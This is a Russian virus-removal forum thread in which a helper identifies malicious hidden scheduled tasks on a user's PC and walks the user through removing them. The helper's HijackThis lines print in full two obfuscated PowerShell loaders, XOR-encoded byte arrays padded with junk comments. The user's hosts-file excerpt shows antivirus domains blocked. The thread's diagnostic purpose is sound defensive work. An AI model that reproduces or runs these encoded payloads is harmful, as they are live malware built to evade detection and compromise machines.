Показано с 1 по 11 из 11.

Модифицированный MSIL/Injector.WGJ откуда ползёт? (заявка № 228436)

  1. #1
    Junior Member Репутация
    Регистрация
    07.01.2024
    Сообщений
    6
    Вес репутации
    7

    Thumbs up Модифицированный MSIL/Injector.WGJ откуда ползёт?

    Приветствую! Прошу помощи в поиске этой чесотки. ESET блокирует, но откуда лезет не могу найти.
    Заранее благодарен!

    пысы
    в файле hosts интересное еще.....
    похожая проблемиа была в сосед ветке связанная с 0.0.0.0 uplooder.net

    0.0.0.0 edf.eset.com
    0.0.0.0 expire.eset.com0.0.0.0 uplooder.net
    0.0.0.0 uploadkon.ir
    0.0.0.0 raw.githubusercontent.com
    0.0.0.0 cdn.discordapp.com


    Addition.txt
    FRST.txt
    Последний раз редактировалось Bioswamp; 07.01.2024 в 19:33.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) Bioswamp, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    07.01.2024
    Сообщений
    6
    Вес репутации
    7

  5. #4
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,577
    Вес репутации
    1086
    Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:
    Код:
    O22 - Tasks: \Microsoft\Windows\Bluetooth\Bioswamp - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "#xqfscungtie\x0D\x0A#yreukvsqflp\x0D\x0A#wznfjymqcukp\x0D\x0A#qyzdw\x0D\x0A#wlgroetqdax\x0D\x0Aicm ([scriptblock]::Create([Text.Encoding]::ASCII.GetString((@(190,223,232,232,245,232,219,249,238,243,245,244,202,232,255,252,255,232,255,244,249,255,186,167,186,184,201,243,246,255,244,238,246,227,217,245,244,238,243,244,239,255,184,151,144,201,255,238,183,202,201,200,255,251,254,214,243,244,255,213,234,238,243,245,244,186,183,210,243,233,238,245,232,227,201,251,236,255,201,238,227,246,255,186,201,251,236,255,212,245,238,242,243,244,253,151,144,237,242,243,246,255,186,178,190,238,232,239,255,179,186,225,151,144,186,186,186,186,217,246,255,251,232,183,222,244,233,217,246,243,255,244,238,217,251,249,242,255,161,151,144,186,186,186,186,243,234,249,245,244,252,243,253,186,181,252,246,239,233,242,254,244,233,161,151,144,186,186,186,186,190,251,254,234,186,167,186,221,255,238,183,212,255,238,219,254,251,234,238,255,232,186,230,186,205,242,255,232,255,183,213,248,240,255,249,238,186,225,186,190,197,180,201,238,251,238,239,233,186,183,255,235,186,189,207,234,189,186,231,151,144,186,186,186,186,190,243,244,254,186,167,186,190,251,254,234,180,211,244,238,255,232,252,251,249,255,211,244,254,255,226,151,144,186,186,186,186,190,243,244,238,186,167,186,190,251,254,234,180,211,244,238,255,232,252,251,249,255,219,246,243,251,233,151,144,186,186,186,186,190,254,244,233,186,167,186,218,178,184,162,180,162,180,162,180,162,184,182,186,184,162,180,162,180,174,180,174,184,179,186,151,144,186,186,186,186,201,255,238,183,222,244,233,217,246,243,255,244,238,201,255,232,236,255,232,219,254,254,232,255,233,233,186,183,211,244,238,255,232,252,251,249,255,211,244,254,255,226,186,190,243,244,254,186,183,201,255,232,236,255,232,219,254,254,232,255,233,233,255,233,186,190,254,244,233,161,151,144,186,186,186,186,201,238,251,232,238,183,201,246,255,255,234,186,183,201,255,249,245,244,254,233,186,178,221,255,238,183,200,251,244,254,245,247,186,183,215,243,244,243,247,239,247,186,171,172,186,183,215,251,226,243,247,239,247,186,168,170,179,161,151,144,186,186,186,186,234,243,244,253,186,253,255,238,249,255,232,238,180,244,255,238,151,144,186,186,186,186,234,243,244,253,186,253,255,238,249,255,232,238,180,244,255,238,151,144,186,186,186,186,190,239,232,246,186,167,186,184,242,238,238,234,233,160,181,181,253,255,238,249,255,232,238,180,244,255,238,181,249,253,238,251,246,255,244,238,180,238,226,238,184,151,144,186,186,186,186,190,237,255,248,200,255,235,239,255,233,238,186,167,186,193,201,227,233,238,255,247,180,212,255,238,180,210,238,238,234,205,255,248,200,255,235,239,255,233,238,199,160,160,217,232,255,251,238,255,178,190,239,232,246,179,151,144,186,186,186,186,190,237,255,248,200,255,235,239,255,233,238,180,215,255,238,242,245,254,186,167,186,184,221,223,206,184,151,144,186,186,186,186,190,232,255,233,234,245,244,233,255,186,167,186,190,237,255,248,200,255,235,239,255,233,238,180,221,255,238,200,255,233,234,245,244,233,255,178,179,151,144,186,186,186,186,190,233,238,232,255,251,247,186,167,186,190,232,255,233,234,245,244,233,255,180,221,255,238,200,255,233,234,245,244,233,255,201,238,232,255,251,247,178,179,151,144,186,186,186,186,190,233,249,232,243,234,238,216,246,245,249,241,186,167,186,193,201,227,233,238,255,247,180,215,251,244,251,253,255,247,255,244,238,180,219,239,238,245,247,251,238,243,245,244,180,201,249,232,243,234,238,216,246,245,249,241,199,160,160,217,232,255,251,238,255,178,178,212,255,237,183,213,248,240,255,249,238,186,201,227,233,238,255,247,180,211,213,180,201,238,232,255,251,247,200,255,251,254,255,232,178,190,233,238,232,255,251,247,179,179,180,200,255,251,254,206,245,223,244,254,178,179,179,151,144,186,186,186,186,190,233,238,232,255,251,247,180,222,243,233,234,245,233,255,178,179,151,144,186,186,186,186,188,186,190,233,249,232,243,234,238,216,246,245,249,241,186,230,186,213,239,238,183,212,239,246,246,151,144,186,186,186,186,200,255,247,245,236,255,183,211,238,255,247,186,183,202,251,238,242,186,184,190,255,244,236,160,233,227,233,238,255,247,254,232,243,236,255,198,205,243,244,254,245,237,233,198,202,232,255,252,255,238,249,242,198,176,180,234,252,184,186,183,220,245,232,249,255,151,144,186,186,186,186,200,255,247,245,236,255,183,211,238,255,247,186,183,202,251,238,242,186,184,190,255,244,236,160,219,202,202,222,219,206,219,198,215,243,249,232,245,233,245,252,238,198,205,243,244,254,245,237,233,198,202,245,237,255,232,201,242,255,246,246,198,202,201,200,255,251,254,214,243,244,255,198,176,180,176,184,186,183,220,245,232,249,255,151,144,186,186,186,186,221,255,238,183,205,243,244,223,236,255,244,238,186,183,214,243,233,238,214,245,253,186,176,186,230,186,205,242,255,232,255,183,213,248,240,255,249,238,186,225,186,190,197,180,214,245,253,206,227,234,255,186,183,244,255,186,184,213,234,255,232,251,238,243,245,244,251,246,184,186,231,186,230,186,220,245,232,223,251,249,242,183,213,248,240,255,249,238,186,225,186,217,246,255,251,232,183,223,236,255,244,238,214,245,253,186,183,214,245,253,212,251,247,255,186,190,197,180,214,245,253,212,251,247,255,186,231,151,144,186,186,186,186,217,246,255,251,232,183,210,245,233,238,151,144,186,186,186,186,217,246,255,251,232,183,210,243,233,238,245,232,227,151,144,151,144,186,186,186,186,201,238,251,232,238,183,201,246,255,255,234,186,183,201,255,249,245,244,254,233,186,178,221,255,238,183,200,251,244,254,245,247,186,183,215,243,244,243,247,239,247,186,168,172,170,170,186,183,215,251,226,243,247,239,247,186,169,172,171,170,179,151,144,231,151,144,151,144,151,144) | % { $_ -bxor 154 }))))\x0D\x0Akwvimuogsnd\x0D\x0Angwvstkr\x0D\x0Aflegtdqw\x0D\x0Adaveqw\x0D\x0Avztump" (sign: '')
    O22 - Tasks: \Microsoft\Windows\WindowsBackup\User - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass "#ryhlibpnz\x0D\x0A#ojdxpcfvy\x0D\x0A#hrjfbkxsv\x0D\x0A#xqkgv\x0D\x0A#wdutpmoh\x0D\x0Aicm ([scriptblock]::Create([Text.Encoding]::ASCII.GetString((@(709,746,739,743,756,683,706,744,757,709,746,751,739,744,754,709,743,741,750,739,701,651,652,751,758,741,745,744,736,751,737,678,681,736,746,755,757,750,738,744,757,701,651,652,725,739,754,683,726,725,724,739,743,738,714,751,744,739,713,758,754,751,745,744,678,683,718,751,757,754,745,756,767,725,743,752,739,725,754,767,746,739,678,725,743,752,739,712,745,754,750,751,744,737,701,651,652,674,743,738,758,678,699,678,705,739,754,683,712,739,754,711,738,743,758,754,739,756,678,762,678,721,750,739,756,739,683,713,740,748,739,741,754,678,765,678,674,729,680,725,754,743,754,755,757,678,683,739,759,678,673,723,758,673,678,763,651,652,674,751,744,738,678,699,678,674,743,738,758,680,719,744,754,739,756,736,743,741,739,719,744,738,739,766,651,652,674,751,744,754,678,699,678,674,743,738,758,680,719,744,754,739,756,736,743,741,739,711,746,751,743,757,651,652,674,738,744,757,678,699,678,710,686,676,702,680,702,680,702,680,702,676,682,678,676,702,680,702,680,690,680,690,676,687,678,651,652,725,739,754,683,706,744,757,709,746,751,739,744,754,725,739,756,752,739,756,711,738,738,756,739,757,757,678,683,719,744,754,739,756,736,743,741,739,719,744,738,739,766,678,674,751,744,738,678,683,725,739,756,752,739,756,711,738,738,756,739,757,757,739,757,678,674,738,744,757,701,651,652,725,754,743,756,754,683,725,746,739,739,758,678,683,725,739,741,745,744,738,757,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,695,688,678,683,715,743,766,751,747,755,747,678,692,694,687,701,651,652,674,739,738,678,699,678,710,686,676,752,743,746,751,738,757,757,746,676,682,678,676,752,743,746,751,738,751,758,676,687,651,652,674,759,738,678,699,678,710,686,676,752,743,746,751,738,751,758,676,682,678,676,752,743,746,751,738,757,757,746,676,682,678,676,754,766,754,749,739,767,676,687,651,652,674,743,740,678,699,678,676,743,740,741,738,739,736,737,750,751,748,749,746,747,744,694,695,692,693,690,691,688,689,702,703,676,651,652,674,738,747,678,699,678,710,686,687,651,652,651,652,736,745,756,739,743,741,750,678,686,674,739,678,751,744,678,674,739,738,687,678,765,651,652,678,678,678,678,674,738,678,699,678,674,739,678,685,678,676,680,744,739,754,676,651,652,678,678,678,678,674,738,747,678,685,699,678,674,738,651,652,763,651,652,651,652,736,745,756,739,743,741,750,678,686,674,759,678,751,744,678,674,759,738,687,678,765,651,652,678,678,678,678,674,738,678,699,678,674,759,678,685,678,676,680,745,744,746,751,744,739,676,651,652,678,678,678,678,674,738,747,678,685,699,678,674,738,651,652,763,651,652,651,652,736,745,756,678,686,674,748,678,699,678,694,701,678,674,748,678,683,746,754,678,691,701,678,674,748,685,685,687,678,765,651,652,678,678,678,678,674,757,739,739,738,678,699,678,705,739,754,683,724,743,744,738,745,747,651,652,678,678,678,678,674,738,678,699,678,676,676,651,652,678,678,678,678,736,745,756,678,686,674,751,678,699,678,694,701,678,674,751,678,683,746,754,678,690,690,701,678,674,751,685,685,687,678,765,651,652,678,678,678,678,678,678,678,678,674,751,744,738,739,766,678,699,678,733,715,743,754,750,731,700,700,704,746,745,745,756,686,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,694,678,683,715,743,766,751,747,755,747,678,686,674,743,740,680,714,739,744,737,754,750,687,687,687,651,652,678,678,678,678,678,678,678,678,674,738,678,685,699,678,674,743,740,733,674,751,744,738,739,766,731,651,652,678,678,678,678,763,651,652,678,678,678,678,674,738,678,685,699,678,676,680,744,739,754,676,651,652,678,678,678,678,674,738,747,678,685,699,678,674,738,651,652,763,651,652,651,652,674,738,747,678,699,678,674,738,747,678,762,678,705,739,754,683,724,743,744,738,745,747,678,683,709,745,755,744,754,678,674,738,747,680,709,745,755,744,754,651,652,651,652,674,755,757,757,678,699,678,710,686,687,651,652,736,745,756,678,686,674,751,699,694,701,678,674,751,678,683,746,754,678,695,702,691,701,678,674,751,685,685,687,678,765,651,652,674,755,757,678,699,678,676,715,745,764,751,746,746,743,681,691,680,694,678,686,721,751,744,738,745,753,757,678,712,722,678,695,694,680,694,701,678,721,751,744,688,690,701,678,766,688,690,687,678,711,758,758,746,739,721,739,740,717,751,754,681,676,678,685,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,693,694,694,694,678,683,715,743,766,751,747,755,747,678,689,694,694,694,687,680,722,745,725,754,756,751,744,737,686,687,678,685,678,676,680,693,688,678,686,717,718,722,715,714,682,678,746,751,749,739,678,705,739,741,749,745,687,678,709,750,756,745,747,739,681,676,678,685,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,689,694,678,683,715,743,766,751,747,755,747,678,703,694,687,680,722,745,725,754,756,751,744,737,686,687,678,685,678,676,680,694,680,676,678,685,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,693,694,694,694,678,683,715,743,766,751,747,755,747,678,690,694,694,694,687,680,722,745,725,754,756,751,744,737,686,687,678,685,678,676,680,676,678,685,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,695,694,694,678,683,715,743,766,751,747,755,747,678,691,694,694,687,680,722,745,725,754,756,751,744,737,686,687,678,685,678,676,678,725,743,736,743,756,751,681,676,678,685,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,693,694,694,694,678,683,715,743,766,751,747,755,747,678,690,694,694,694,687,680,722,745,725,754,756,751,744,737,686,687,678,685,678,676,680,676,678,685,678,686,705,739,754,683,724,743,744,738,745,747,678,683,715,751,744,751,747,755,747,678,695,694,694,678,683,715,743,766,751,747,755,747,678,691,694,694,687,680,722,745,725,754,756,751,744,737,686,687,651,652,674,755,757,757,678,685,699,678,674,755,757,651,652,763,651,652,651,652,674,756,743,678,699,678,674,755,757,757,678,762,678,705,739,754,683,724,743,744,738,745,747,701,651,652,651,652,674,756,757,678,699,678,674,744,755,746,746,651,652,736,745,756,739,743,741,750,678,686,674,738,678,751,744,678,674,738,747,687,678,765,651,652,678,678,678,678,754,756,767,678,765,651,652,678,678,678,678,678,678,678,678,674,738,744,678,699,678,724,739,757,745,746,752,739,683,706,744,757,712,743,747,739,678,683,712,743,747,739,678,674,738,678,683,722,767,758,739,678,722,734,722,678,683,706,744,757,713,744,746,767,651,652,678,678,678,678,678,678,678,678,751,736,678,686,674,738,744,687,678,765,651,652,678,678,678,678,678,678,678,678,678,678,678,678,674,754,766,754,678,699,678,674,738,744,678,762,678,721,750,739,756,739,683,713,740,748,739,741,754,678,765,674,729,680,722,767,758,739,678,683,739,759,678,676,722,734,722,676,763,651,652,678,678,678,678,678,678,678,678,678,678,678,678,674,754,766,754,757,678,699,678,674,754,766,754,680,725,754,756,751,744,737,757,651,652,678,678,678,678,678,678,678,678,678,678,678,678,674,740,743,678,699,678,674,754,766,754,757,678,683,757,758,746,751,754,678,673,682,673,678,762,678,704,745,756,707,743,741,750,683,713,740,748,739,741,754,678,765,678,733,740,767,754,739,731,674,729,678,763,651,652,678,678,678,678,678,678,678,678,678,678,678,678,674,725,754,756,678,699,678,733,725,767,757,754,739,747,680,722,739,766,754,680,707,744,741,745,738,751,744,737,731,700,700,706,739,736,743,755,746,754,680,705,739,754,725,754,756,751,744,737,686,674,740,743,687,651,652,678,678,678,678,678,678,678,678,678,678,678,678,651,652,678,678,678,678,678,678,678,678,678,678,678,678,751,736,678,686,674,725,754,756,687,678,765,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,674,755,678,699,678,676,674,725,754,756,676,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,733,725,767,757,754,739,747,680,712,739,754,680,725,739,756,752,751,741,739,726,745,751,744,754,715,743,744,743,737,739,756,731,700,700,725,739,756,752,739,756,709,739,756,754,751,736,751,741,743,754,739,720,743,746,751,738,743,754,751,745,744,709,743,746,746,740,743,741,749,678,699,678,765,674,754,756,755,739,763,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,674,756,678,699,678,733,725,767,757,754,739,747,680,712,739,754,680,718,754,754,758,721,739,740,756,739,759,755,739,757,754,731,700,700,709,756,739,743,754,739,686,674,755,687,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,674,756,680,723,757,739,756,711,737,739,744,754,678,699,678,674,756,743,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,674,756,680,715,739,754,750,745,738,678,699,678,676,705,707,722,676,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,674,756,757,678,699,678,674,756,680,705,739,754,724,739,757,758,745,744,757,739,686,687,651,652,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,678,740,756,739,743,749,701,651,652,678,678,678,678,678,678,678,678,678,678,678,678,763,651,652,678,678,678,678,678,678,678,678,763,651,652,678,678,678,678,763,678,741,743,754,741,750,678,765,651,652,651,652,678,678,678,678,678,678,678,678,674,756,743,678,699,678,686,674,755,757,757,678,762,678,721,750,739,756,739,683,713,740,748,739,741,754,678,765,674,729,678,683,744,739,678,674,756,743,763,678,762,678,705,739,754,683,724,743,744,738,745,747,687,701,651,652,678,678,678,678,763,651,652,763,651,652,651,652,751,736,678,686,674,756,757,687,678,765,651,652,678,678,678,678,674,757,754,678,699,678,674,756,757,680,705,739,754,724,739,757,758,745,744,757,739,725,754,756,739,743,747,686,687,651,652,678,678,678,678,674,756,739,743,738,739,756,678,699,678,712,739,753,683,713,740,748,739,741,754,678,725,767,757,754,739,747,680,719,713,680,725,754,756,739,743,747,724,739,743,738,739,756,686,674,757,754,687,651,652,678,678,678,678,674,757,754,766,754,678,699,678,674,756,739,743,738,739,756,680,724,739,743,738,722,745,707,744,738,686,687,651,652,678,678,678,678,674,757,740,678,699,678,733,725,741,756,751,758,754,708,746,745,741,749,731,700,700,709,756,739,743,754,739,686,674,757,754,766,754,687,651,652,678,678,678,678,674,756,739,743,738,739,756,680,706,751,757,758,745,757,739,686,687,701,651,652,678,678,678,678,751,741,747,678,674,757,740,701,651,652,763,651,652,651,652,674,739,752,739,744,754,714,745,737,757,678,699,678,705,739,754,683,721,751,744,707,752,739,744,754,678,683,714,751,757,754,714,745,737,678,684,651,652,736,745,756,739,743,741,750,678,686,674,746,745,737,678,751,744,678,674,739,752,739,744,754,714,745,737,757,687,678,765,651,652,678,678,678,678,751,736,678,686,674,746,745,737,680,714,745,737,722,767,758,739,678,683,744,739,678,676,713,758,739,756,743,754,751,745,744,743,746,676,687,678,765,651,652,678,678,678,678,678,678,678,678,709,746,739,743,756,683,707,752,739,744,754,714,745,737,678,683,714,745,737,712,743,747,739,678,674,746,745,737,680,714,745,737,712,743,747,739,701,651,652,678,678,678,678,763,651,652,763,651,652,651,652,709,746,739,743,756,683,706,744,757,709,746,751,739,744,754,709,743,741,750,739,701,651,652,751,758,741,745,744,736,751,737,678,681,736,746,755,757,750,738,744,757,651,652,709,746,739,743,756,683,718,745,757,754,701,651,652,709,746,739,743,756,683,718,751,757,754,745,756,767,701,651,652,724,739,747,745,752,739,683,719,754,739,747,678,683,726,743,754,750,678,676,674,739,744,752,700,757,767,757,754,739,747,738,756,751,752,739,730,721,751,744,738,745,753,757,730,726,756,739,736,739,754,741,750,730,684,680,758,736,676,678,683,704,745,756,741,739,701,651,652,724,739,747,745,752,739,683,719,754,739,747,678,683,726,743,754,750,678,676,674,739,744,752,700,711,726,726,706,711,722,711,730,715,751,741,756,745,757,745,736,754,730,721,751,744,738,745,753,757,730,726,745,753,739,756,725,750,739,746,746,730,726,725,724,739,743,738,714,751,744,739,730,684,680,684,676,678,683,704,745,756,741,739,701,651,652,677,738,744,757,651,652,651,652) | % { $_ -bxor 646 }))))\x0D\x0Apdcvhwqiom\x0D\x0Aalwxnj\x0D\x0Azrvphj\x0D\x0Aqecgmld\x0D\x0Analohjwqvt" (sign: '')
    Сообщите, что с проблемой.
    WBR,
    Vadim

  6. #5
    Junior Member Репутация
    Регистрация
    07.01.2024
    Сообщений
    6
    Вес репутации
    7
    Прошу прощения но этих строк нет в HighJack по причине скорее всего, что я пока ждал ответа от Вас, установил MBAM, он обнаружил в выше указанных \Microsoft\Windows\Bluetooth\ и \Microsoft\Windows\WindowsBackup\User какойто "Tojan Tasker" и прибил его.
    Пока больше небыло обнаружений ни ESET ни MBAM.
    На всякий прилагаю новый сканлог Autologger

    Что можно еще сделать для проверки чтобы убедиться в чистоте системы?

    CollectionLog-2024.01.07-21.41.zip
    Последний раз редактировалось Bioswamp; 09.01.2024 в 12:32.

  7. #6
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,577
    Вес репутации
    1086
    По логам чисто. ESET и MBAM ничего не находят?
    WBR,
    Vadim

  8. #7
    Junior Member Репутация
    Регистрация
    07.01.2024
    Сообщений
    6
    Вес репутации
    7
    Все чисто. Хотел бы просканировать еще чем то, раньше был такой ESET SysRescue, но немогу найти где скачть, на оффсайте почему то кнопка неактивна

  9. #8
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,577
    Вес репутации
    1086
    Смысла сканировать ещё одним продуктом Eset нет, да и не было ничего, кроме ткх двух заданий.

    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim

  10. #9
    Junior Member Репутация
    Регистрация
    07.01.2024
    Сообщений
    6
    Вес репутации
    7

  11. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,577
    Вес репутации
    1086
    Порядок.
    WBR,
    Vadim

  12. #11
    Junior Member Репутация
    Регистрация
    07.01.2024
    Сообщений
    6
    Вес репутации
    7
    Спасибо за помощь!

  • Уважаемый(ая) Bioswamp, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 2
      Последнее сообщение: 27.10.2013, 14:39
    2. Brontok.A [Trojan.Win32.Inject.gcxt, Backdoor.Win32.Azbreg.wgj ]
      От depresnak в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 02.09.2013, 11:24
    3. модифицированный Win32/Injector.JM троян
      От loGan88 в разделе Помогите!
      Ответов: 8
      Последнее сообщение: 26.02.2009, 20:57
    4. Модифицированный Win32/Injector.Z
      От call03 в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 22.02.2009, 05:17
    5. Ответов: 11
      Последнее сообщение: 30.12.2007, 15:12

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01155 seconds with 19 queries